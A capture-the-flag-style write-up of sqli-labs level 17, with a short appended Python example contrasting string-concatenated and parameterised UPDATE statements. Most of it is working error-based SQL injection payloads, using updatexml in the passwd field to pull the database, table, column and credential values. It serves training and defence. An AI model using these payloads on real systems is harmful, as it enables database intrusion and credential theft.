SQLi Level 17
uname=admin&passwd=admin' and 1=1#&submit=Submit
uname=admin&passwd=admin' and 1=2#&submit=Submit
I deeply feel that I have not learned the essence of SQL injection.
uname=admin&passwd=admin' order by 1#&submit=Submit
Unknown column '1' in 'order clause'
I'm baffled, why.....
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select database()),0x7e),1))#&submit=Submit #XPATH syntax error: '~security~'
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&submit=Submit #XPATH syntax error: '~users~'
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&submit=Submit #XPATH syntax error: '~username~'
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&submit=Submit #XPATH syntax error: '~password~'
uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select password from users),0x7e),1))#&submit=Submit
Stumped: You can't specify target table 'users' for update in FROM clause
You cannot first select some values from a table and then update that same table (in the same statement).
Solution: select the result again as a derived table, which avoids the error.
Note: this problem only occurs in MySQL; MSSQL and Oracle do not have it.
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select * from (select username from users limit 0,1) a),0x7e),1)#&submit=Submit #XPATH syntax error: '~Dumb~'
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select * from (select password from users limit 0,1) a),0x7e),1)#&submit=Submit #XPATH syntax error: '~Dumb~'
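As an added example (not part of this write-up), here is the shape of the sink that this level exercises: a password-reset UPDATE that pastes the passwd field into the SQL text, beside the parameterised form that stores the same payload as inert data. The table layout, column names and the reset function are assumptions; the payload is the first one from the write-up.

```python
# Added example, not code from the write-up or from sqli-labs.
# Assumed sink: a password reset that updates `users` by username.
import sqlite3

# Constructed in-memory stand-in for the `users` table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'secret')")
    conn.commit()
    return conn

def build_vulnerable_sql(uname, passwd):
    # String concatenation: passwd becomes part of the SQL grammar, not a value.
    return ("UPDATE users SET password='" + passwd
            + "' WHERE username='" + uname + "'")

def reset_password_safe(conn, uname, passwd):
    # Parameterised statement: passwd is bound as data whatever characters it holds.
    cur = conn.execute("UPDATE users SET password=? WHERE username=?",
                       (passwd, uname))
    conn.commit()
    return cur.rowcount

def stored_password(conn, uname):
    row = conn.execute("SELECT password FROM users WHERE username=?",
                       (uname,)).fetchone()
    return row[0] if row else None

PAYLOAD = "admin' and 1=1#"   # passwd value from the write-up's first request

if __name__ == "__main__":
    conn = make_db()
    # The concatenated text ends up as:
    #   UPDATE users SET password='admin' and 1=1#' WHERE username='admin'
    # On MySQL `#` starts a comment, so the real closing quote and the WHERE
    # clause are discarded and the attacker's text is parsed as SQL; that is
    # what lets the error-based payloads in this level surface data.
    print(build_vulnerable_sql("admin", PAYLOAD))
    reset_password_safe(conn, "admin", PAYLOAD)
    # The bound version stores the literal string; nothing in it is executed.
    print(repr(stored_password(conn, "admin")))
```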